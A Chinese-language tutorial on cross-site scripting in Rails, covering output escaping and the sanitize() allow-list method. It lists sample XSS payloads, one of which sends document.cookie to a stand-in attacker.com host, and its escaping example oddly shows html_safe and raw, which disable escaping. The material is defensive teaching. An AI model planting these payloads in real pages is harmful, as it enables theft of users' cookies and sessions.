跨站脚本攻击XSS(Cross-Site Scripting)

XSS可说是网站界第一名常见的攻击模式,恶意的使用者可以将脚本程式码放在网页上让其他使用者执行,任何可以让使用者输入资料的网站,都必须小心这个问题。例如可以将以下的程式贴到网页上:

<script>alert('HACK YOU!');</script>
<img src=javascript:alert('HACK YOU!')>
<table background="javascript:alert('HACK YOU!')">
<script>document.write(document.cookie);</script>
<script>document.write('<img src="http://www.attacker.com/' + document.cookie + '">');</script>

当一般使用者浏览到这一页时,就会跳出alert视窗,或是将敏感资料例如cookie内容传给攻击者。
要防范这个问题的方法,就是要逸出使用者输入的内容,例如将

`"<p>safe</p>".html_safe
# 或
raw("<p>safe</p>")`

在Rails 3之前不会自动逸出,因此在样板中需要加escapeHTML()或h()方法。也因为很多人常常会忘记造成XSS漏洞,所以在Rails 3之后就改成默认逸出了。
关于如何在 Rails Helper 中正确处理逸出 HTML,请参考「Action View - Helpers 方法」的 如何安全地处理HTML逸出问题? 一节。
如何开放使用者张贴HTML
但是有时候我们还是必须开放让使用者可以张贴简单的HTML内容,例如超连结、图片、标题等等。这时候我们可以用白名单的作法,Rails提供了sanitize()方法可以过滤逸出。
即使使用Textile或Markdown语法,你还是必须过滤HTML标籤。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值